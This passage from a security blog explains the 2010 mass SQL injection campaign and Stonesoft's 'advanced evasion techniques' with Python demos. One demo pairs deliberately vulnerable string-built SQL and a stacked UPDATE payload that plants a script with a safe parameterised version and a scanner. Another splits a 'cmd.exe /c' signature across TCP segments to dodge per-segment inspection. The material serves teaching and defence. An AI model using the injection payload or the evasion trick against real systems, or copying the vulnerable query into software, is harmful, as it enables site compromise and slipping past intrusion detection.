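    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def _run_stacked(conn, sql):
    """Emulates a driver that accepts several ';'-separated statements in one
    call, as the stacks hit by this campaign do. sqlite3's execute() refuses
    stacked statements by itself, so the text is split here. Returns the rows
    of the first statement, which is all the application expected to run."""
    cur = conn.cursor()
    first_rows = None
    for stmt in (s.strip() for s in sql.split(";")):
        if not stmt:
            continue
        cur.execute(stmt)
        if first_rows is None:
            first_rows = cur.fetchall()
    conn.commit()
    return first_rows or []


def get_article_vulnerable(conn, article_id):
    """The bug the page describes: a URL parameter pasted straight into SQL."""
    sql = f"SELECT title, body FROM articles WHERE id = {article_id}"
    rows = _run_stacked(conn, sql)
    return rows[0] if rows else None


def get_article_safe(conn, article_id):
    """Hardened form: the value travels as a bound parameter, never as SQL
    text, so whatever it contains can only ever be compared against id."""
    cur = conn.execute("SELECT title, body FROM articles WHERE id = ?", (article_id,))
    return cur.fetchone()


def find_injected_scripts(conn):
    """Scans stored text for <script src> references to hosts outside the
    allowlist, the indicator this campaign leaves in the database.
    Returns a list of (row id, script URL)."""
    hits = []
    for row_id, body in conn.execute("SELECT id, body FROM articles"):
        for src in SCRIPT_SRC.findall(body or ""):
            host = src.split("//", 1)[-1].split("/", 1)[0].lower()
            if host not in ALLOWED_SCRIPT_HOSTS:
                hits.append((row_id, src))
    return hits


if __name__ == "__main__":
    # A parameter value that terminates the intended query and appends an UPDATE.
    payload = "1; UPDATE articles SET body = body || '" + INJECTED_FRAGMENT + "'"
    db = make_db()
    print("vulnerable lookup:", get_article_vulnerable(db, payload))
    print("rows now carrying a foreign script:", find_injected_scripts(db))
    db = make_db()
    print("safe lookup:", get_article_safe(db, payload), find_injected_scripts(db))
```

The safe version returns nothing for the same input because the whole string is compared against the integer `id` column and matches no row; the database never sees a second statement. The scan is the after-the-fact check: it is cheap to run over every text column after an incident like this, and a hit on a host that is not in the allowlist is exactly what the compromised sites had.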

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times as many URLs are infected, and the numbers are still growing. The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system.

However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified. SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands.

In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia. It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Thursday, October 21, 2010

Advanced evasion techniques can bypass network security

After "APT", we now have "AET"

A new hacking technique creates a mechanism for hackers to smuggle attacks past security defences, such as firewalls and intrusion prevention systems.

So-called advanced evasion techniques (AET) are capable of bypassing network security defences, according to network security appliance firm Stonesoft, which was the first to document the approach. Researchers at the Finnish firm came across the attack while testing its security appliance against the latest hacker exploits.

Various evasion techniques including splicing and fragmentation have existed for years. Security devices have to normalise traffic using these approaches before they can inspect payloads and block attacks.

Refer here to read more details.
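The point about normalisation is easiest to see in code. Here is an added example in Python (written for this post, not Stonesoft's or anyone else's code) of the fragmentation case the previous paragraph mentions: a pattern that an inspection device is looking for is cut across several TCP segments that arrive out of order, with an overlapping retransmission thrown in. Matching each segment on its own never sees the pattern; reassembling the stream first does. The signature string, the request and the segment boundaries are all constructed for the demo, and the reassembler is a minimal one that applies a "first copy wins" rule to overlaps and stops at a hole.

```python
from dataclasses import dataclass

# Constructed detection pattern for the demo, not a real IDS rule.
SIGNATURE = b"cmd.exe /c"


@dataclass(frozen=True)
class Segment:
    seq: int      # relative TCP sequence number of the first payload byte
    data: bytes


def match_per_segment(segments, signature=SIGNATURE):
    """Inspection without normalisation: each segment is matched on its own,
    so a pattern that straddles a segment boundary is never seen whole."""
    return any(signature in seg.data for seg in segments)


def reassemble(segments):
    """Orders segments by sequence number and stitches them into one byte
    stream. Bytes already covered by an earlier segment win over a later,
    overlapping one ('first wins'); a hole in the sequence space stops
    reassembly, because nothing past it can be interpreted yet."""
    stream = bytearray()
    covered = 0                         # bytes of the stream seen so far
    for seg in sorted(segments, key=lambda s: s.seq):
        if seg.seq > covered:
            break                       # gap: wait for the missing segment
        fresh = seg.data[covered - seg.seq:]   # drop already-covered prefix
        stream += fresh
        covered += len(fresh)
    return bytes(stream)


def match_normalised(segments, signature=SIGNATURE):
    """Inspection after normalisation: match against the reassembled stream."""
    return signature in reassemble(segments)


# Constructed sample: one request whose payload was cut into three segments at
# points chosen inside the signature, delivered out of order, plus a
# retransmission that overlaps bytes already received.
STREAM = b"GET /?q=cmd.exe /c dir HTTP/1.0\r\n"
EVASIVE_SEGMENTS = [
    Segment(15, STREAM[15:]),           # tail arrives first
    Segment(0, STREAM[:10]),            # b"GET /?q=cm"
    Segment(5, STREAM[5:10]),           # overlapping retransmit of b"?q=cm"
    Segment(10, STREAM[10:15]),         # b"d.exe", the middle of the pattern
]

if __name__ == "__main__":
    print("per-segment match:", match_per_segment(EVASIVE_SEGMENTS))   # False
    print("normalised match: ", match_normalised(EVASIVE_SEGMENTS))    # True
    print("reassembled:", reassemble(EVASIVE_SEGMENTS))
```

The caveat a practitioner will want: operating systems do not all resolve overlapping segments the same way, so a device that reassembles with a different overlap policy than the host behind it can end up inspecting a different byte stream than the one the host actually processes. That mismatch is what makes normalisation hard to get right, and why the page's examples (splicing, fragmentation) have stayed useful against products for so long.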